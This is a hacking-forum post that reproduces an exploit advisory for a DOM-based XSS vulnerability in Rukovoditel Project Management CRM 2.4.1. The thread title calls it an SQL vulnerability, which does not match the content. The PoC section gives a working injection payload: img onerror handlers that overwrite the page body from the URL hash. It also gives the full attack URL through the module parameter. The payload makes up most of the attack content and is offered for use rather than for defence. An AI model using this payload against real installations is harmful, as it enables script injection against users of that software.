Rukovoditel PRM-CRM 2.4.1 SQL Vuln.
by Adient - 05-30-2019, 10:54 PM
#1
####################################################################


# Exploit Title : Rukovoditel Project Management CRM 2.4.1 - XSS Vulnerability (DOM BASED)
# Author [ Discovered By ] : ADİENT
# Team : TURKHACK
# Date : 29/01/2019
# Vendor Homepage : https://www.rukovoditel.net/
# Software Link : https://sourceforge.net/projects/rukovoditel/
# Affected Versions : 2.4.1
# Tested On : Wampp, Windows,Lampp
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
# https://cxsecurity.com/issue/WLB-2019010288
# Sofrware Descr*iption : Rukovoditel is a free web-based open-source project management 
application. A far cry from traditional applications, Rukovoditel gives 
users a broader and extensive approach to project management. Its 
customization options allow users to create additional entities, modify 
and specify the relationship between them, and generate the necessary reports. 

####################################################################

# Impact :
*********

* This web application called as Rukovoditel Project Management CRM 2.4.1 version.
* first of all, delete the value string from the URL (...module=users%2flogin)
* after, add the XSS code I‘ve given below to the end of the URL.
* The proof will be the picture below.
* https://i.hizliresim.com/6aydM7.jpg

####################################################################

# PoC :
****************************
* XSS Code : " gt; lt;img src=x onerror=document.body.innerHTML=location.hash gt;#" gt; lt;img src=x onerror=prompt(123456789) gt;
* Value : users%2flogin
* Get Request : http://localhost/[PATH]/index.php?module=users%2flogin
* URL : http://localhost/rukovoditel/index.php?module=" gt; lt;img src=x onerror=document.body.innerHTML=location.hash gt;#" gt; lt;img src=x onerror=prompt(123456789) gt;

####################################################################
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Newsbull Haber Script XSS Vuln. Adient 0 146 05-30-2019, 10:55 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 82 05-30-2019, 10:52 PM
Last Post: Adient
PilusCart 1.4.1 - SQL Vuln. storix 0 86 05-30-2019, 10:40 PM
Last Post: storix

 Users browsing this thread: 1 Guest(s)